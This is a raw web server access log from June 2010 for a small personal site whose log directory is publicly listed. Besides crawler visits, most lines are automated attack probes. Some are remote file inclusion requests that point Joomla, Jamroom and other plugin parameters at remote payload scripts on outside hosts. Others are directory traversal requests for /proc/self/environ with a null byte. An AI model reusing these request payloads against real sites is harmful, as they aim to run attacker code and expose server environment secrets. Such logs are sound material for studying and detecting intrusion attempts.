184.73.32.42 - - [27/Jun/2010:03:12:03 -0500] "GET /artwork/ HTTP/1.1" 200 11078 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.32.42 - - [27/Jun/2010:03:12:03 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.32.42 - - [27/Jun/2010:03:12:03 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.32.42 - - [27/Jun/2010:03:12:04 -0500] "GET /?M=A HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.32.42 - - [27/Jun/2010:03:12:50 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.32.42 - - [27/Jun/2010:03:12:51 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.32.42 - - [27/Jun/2010:03:13:26 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.32.42 - - [27/Jun/2010:03:13:27 -0500] "GET /logs/ HTTP/1.1" 200 11106 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
62.122.96.6 - - [27/Jun/2010:03:14:23 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 200 11106 "-""Casper Bot Search"
62.122.96.6 - - [27/Jun/2010:03:14:23 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Casper Bot Search"
62.122.96.6 - - [27/Jun/2010:03:14:23 -0500] "GET /logs/access_log.1275609600/?option=com_ninjarsssyndicator&controller=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Casper Bot Search"
184.73.32.42 - - [27/Jun/2010:03:14:23 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.32.42 - - [27/Jun/2010:03:14:24 -0500] "GET /logs/access_log.1277078400 HTTP/1.1" 200 32768 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.32.42 - - [27/Jun/2010:03:14:25 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.32.42 - - [27/Jun/2010:03:14:25 -0500] "GET /logs/access_log.1271548800 HTTP/1.1" 200 32768 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.32.42 - - [27/Jun/2010:03:14:43 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.32.42 - - [27/Jun/2010:03:14:43 -0500] "GET /logs/access_log.1276300800 HTTP/1.1" 200 32768 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.32.42 - - [27/Jun/2010:03:14:44 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.32.42 - - [27/Jun/2010:03:14:45 -0500] "GET /logs/access_log.1277510400 HTTP/1.1" 200 32768 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
62.122.96.6 - - [27/Jun/2010:03:15:00 -0500] "GET /logs/access_log.1276732800/?option=com_ninjarsssyndicator&controller=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Casper Bot Search"
93.186.192.124 - - [27/Jun/2010:03:19:58 -0500] "GET /solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
93.186.192.124 - - [27/Jun/2010:03:19:58 -0500] "GET /logs/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
93.186.192.124 - - [27/Jun/2010:03:19:58 -0500] "GET /logs/access_log.1275782400%20%20/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
93.186.192.124 - - [27/Jun/2010:03:19:58 -0500] "GET /logs/access_log.1276041600%20%20/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
93.186.192.124 - - [27/Jun/2010:03:20:14 -0500] "GET /solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
93.186.192.124 - - [27/Jun/2010:03:20:14 -0500] "GET /logs/access_log.1275782400%20%20/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
93.186.192.124 - - [27/Jun/2010:03:20:14 -0500] "GET /logs/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
93.186.192.124 - - [27/Jun/2010:03:20:14 -0500] "GET /logs/access_log.1276041600%20%20/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
93.186.192.124 - - [27/Jun/2010:03:20:20 -0500] "GET /logs/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
93.186.192.124 - - [27/Jun/2010:03:20:20 -0500] "GET /logs/access_log.1276041600%20%20/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
93.186.192.124 - - [27/Jun/2010:03:20:20 -0500] "GET /solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
93.186.192.124 - - [27/Jun/2010:03:20:20 -0500] "GET /logs/access_log.1275782400%20%20/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
93.186.192.124 - - [27/Jun/2010:03:20:57 -0500] "GET /solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
93.186.192.124 - - [27/Jun/2010:03:20:57 -0500] "GET /logs/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
93.186.192.124 - - [27/Jun/2010:03:20:57 -0500] "GET /logs/access_log.1275782400%20%20/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
93.186.192.124 - - [27/Jun/2010:03:20:57 -0500] "GET /logs/access_log.1276041600%20%20/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
93.186.192.124 - - [27/Jun/2010:03:21:00 -0500] "GET /solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
93.186.192.124 - - [27/Jun/2010:03:21:00 -0500] "GET /logs/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
93.186.192.124 - - [27/Jun/2010:03:21:00 -0500] "GET /logs/access_log.1276041600%20%20/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
93.186.192.124 - - [27/Jun/2010:03:21:00 -0500] "GET /logs/access_log.1275782400%20%20/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
62.122.96.6 - - [27/Jun/2010:03:21:00 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Casper Bot Search"
62.122.96.6 - - [27/Jun/2010:03:21:01 -0500] "GET /logs/access_log.1276732800/?option=com_ninjarsssyndicator&controller=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Casper Bot Search"
62.122.96.6 - - [27/Jun/2010:03:21:01 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 200 11106 "-""Casper Bot Search"
62.122.96.6 - - [27/Jun/2010:03:21:03 -0500] "GET /logs/access_log.1276214400/?option=com_ninjarsssyndicator&controller=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Casper Bot Search"
78.41.233.128 - - [27/Jun/2010:03:21:10 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
78.41.233.128 - - [27/Jun/2010:03:21:10 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
78.41.233.128 - - [27/Jun/2010:03:21:10 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:03:21:13 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:03:21:14 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:03:21:14 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.805"
93.186.192.124 - - [27/Jun/2010:03:21:20 -0500] "GET /logs/access_log.1275782400%20%20/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
93.186.192.124 - - [27/Jun/2010:03:21:20 -0500] "GET /logs/access_log.1276041600%20%20/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
93.186.192.124 - - [27/Jun/2010:03:21:20 -0500] "GET /logs/solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
93.186.192.124 - - [27/Jun/2010:03:21:20 -0500] "GET /solpot.html?body=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
94.247.176.194 - - [27/Jun/2010:03:21:52 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:03:21:52 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:03:21:53 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.805"
67.195.112.180 - - [27/Jun/2010:03:23:01 -0500] "GET /costume/links.htm HTTP/1.0" 200 1029 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.253.135.181 - - [27/Jun/2010:03:23:02 -0500] "GET /logs/access_log.1274054400//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
87.253.135.181 - - [27/Jun/2010:03:23:03 -0500] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.253.135.181 - - [27/Jun/2010:03:23:03 -0500] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.250.252.241 - - [27/Jun/2010:03:24:44 -0500] "GET /logs/access_log.1214092800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.247.176.194 - - [27/Jun/2010:03:26:36 -0500] "GET /logs/access_log.1276732800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
78.41.233.128 - - [27/Jun/2010:03:26:36 -0500] "GET /logs/access_log.1276732800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:03:27:07 -0500] "GET /logs/access_log.1276732800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
62.43.194.164 - - [27/Jun/2010:03:30:05 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.dyesscreek.com/famtree/documents/ID-RFI.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
212.36.64.35 - - [27/Jun/2010:03:30:20 -0500] "GET /logs/access_log.1274572800//admin/business_inc/saveserver.php?thisdir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
212.36.64.35 - - [27/Jun/2010:03:30:21 -0500] "GET //admin/business_inc/saveserver.php?thisdir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
212.36.64.35 - - [27/Jun/2010:03:30:21 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
85.19.150.100 - - [27/Jun/2010:03:31:29 -0500] "GET /*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
85.19.150.100 - - [27/Jun/2010:03:31:29 -0500] "GET /*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
67.59.156.163 - - [27/Jun/2010:03:32:21 -0500] "GET //index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
212.36.64.35 - - [27/Jun/2010:03:32:34 -0500] "GET /logs/access_log.1274572800//admin/business_inc/saveserver.php?thisdir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
212.36.64.35 - - [27/Jun/2010:03:32:34 -0500] "GET //admin/business_inc/saveserver.php?thisdir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
212.36.64.35 - - [27/Jun/2010:03:32:34 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
212.36.64.35 - - [27/Jun/2010:03:32:37 -0500] "GET /logs/access_log.1274572800//admin/business_inc/saveserver.php?thisdir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
212.36.64.35 - - [27/Jun/2010:03:32:37 -0500] "GET //admin/business_inc/saveserver.php?thisdir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
212.36.64.35 - - [27/Jun/2010:03:32:37 -0500] "GET /logs/access_log.1274572800//admin/business_inc/saveserver.php?thisdir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
212.36.64.35 - - [27/Jun/2010:03:32:37 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
212.36.64.35 - - [27/Jun/2010:03:32:38 -0500] "GET //admin/business_inc/saveserver.php?thisdir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
212.36.64.35 - - [27/Jun/2010:03:32:38 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
67.59.156.163 - - [27/Jun/2010:03:32:39 -0500] "GET //index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:03:33:24 -0500] "GET /logs/access_log.1276732800//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:03:33:25 -0500] "GET //index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:03:33:25 -0500] "GET /logs//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:03:33:25 -0500] "GET /logs/access_log.1276041600//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:03:33:31 -0500] "GET /logs/access_log.1276732800//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:03:33:31 -0500] "GET //index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:03:33:31 -0500] "GET /logs//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:03:33:32 -0500] "GET /logs/access_log.1276041600//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:03:34:03 -0500] "GET //index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:03:34:51 -0500] "GET //index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:03:35:58 -0500] "GET /logs/access_log.1276732800//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:03:35:59 -0500] "GET //index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:03:35:59 -0500] "GET /logs//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:03:35:59 -0500] "GET /logs/access_log.1276041600//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:03:35:59 -0500] "GET /logs/access_log.1276732800//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:03:35:59 -0500] "GET //index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:03:35:59 -0500] "GET /logs//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:03:36:00 -0500] "GET /logs/access_log.1276041600//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
195.225.170.108 - - [27/Jun/2010:03:36:30 -0500] "GET /*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
67.195.112.180 - - [27/Jun/2010:03:37:22 -0500] "GET /logs/access_log.1220140800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
62.43.194.164 - - [27/Jun/2010:03:38:48 -0500] "GET /logs/access_log.1266710400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.dyesscreek.com/famtree/documents/ID-RFI.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
62.43.194.164 - - [27/Jun/2010:03:38:49 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.dyesscreek.com/famtree/documents/ID-RFI.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
62.43.194.164 - - [27/Jun/2010:03:38:49 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.dyesscreek.com/famtree/documents/ID-RFI.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
62.43.194.164 - - [27/Jun/2010:03:40:01 -0500] "GET /logs/access_log.1274572800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.dyesscreek.com/famtree/documents/ID-RFI.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
194.109.22.72 - - [27/Jun/2010:03:40:49 -0500] "GET /components/com_sef/sef.php?mosConfig.absolute.path=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 404 310 "-""Casper Bot Search"
194.109.22.72 - - [27/Jun/2010:03:40:49 -0500] "GET /logs/access_log.1274572800%20%20/components/com_sef/sef.php?mosConfig.absolute.path=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 404 339 "-""Casper Bot Search"
194.109.22.72 - - [27/Jun/2010:03:40:50 -0500] "GET /logs/components/com_sef/sef.php?mosConfig.absolute.path=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 404 315 "-""Casper Bot Search"
87.54.38.148 - - [27/Jun/2010:03:44:26 -0500] "GET /logs/access_log.1274572800//index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
87.54.38.148 - - [27/Jun/2010:03:44:27 -0500] "GET //index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
87.54.38.148 - - [27/Jun/2010:03:44:27 -0500] "GET /logs//index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
184.73.32.42 - - [27/Jun/2010:03:45:45 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.32.42 - - [27/Jun/2010:03:45:45 -0500] "GET /logs/?M=A HTTP/1.1" 200 11106 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.32.42 - - [27/Jun/2010:03:46:53 -0500] "GET /logs/access_log.1274918400 HTTP/1.1" 200 32768 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.32.42 - - [27/Jun/2010:03:46:56 -0500] "GET /logs/access_log.1273881600 HTTP/1.1" 200 32768 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.32.42 - - [27/Jun/2010:03:46:57 -0500] "GET /logs/access_log.1271635200 HTTP/1.1" 200 32768 "-""Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
87.54.38.148 - - [27/Jun/2010:03:47:11 -0500] "GET /logs/access_log.1275868800//index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
194.109.22.72 - - [27/Jun/2010:03:47:25 -0500] "GET /logs/components/com_sef/sef.php?mosConfig.absolute.path=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 404 315 "-""Casper Bot Search"
194.109.22.72 - - [27/Jun/2010:03:47:28 -0500] "GET /components/com_sef/sef.php?mosConfig.absolute.path=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 404 310 "-""Casper Bot Search"
194.109.22.72 - - [27/Jun/2010:03:47:28 -0500] "GET /logs/access_log.1274572800%20%20/components/com_sef/sef.php?mosConfig.absolute.path=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 404 339 "-""Casper Bot Search"
67.195.112.180 - - [27/Jun/2010:03:47:50 -0500] "GET /costume/thmb5.htm HTTP/1.0" 200 3414 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
195.56.55.217 - - [27/Jun/2010:03:48:22 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.122.96.6 - - [27/Jun/2010:03:49:58 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://lshungary.hu/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Casper Bot Search"
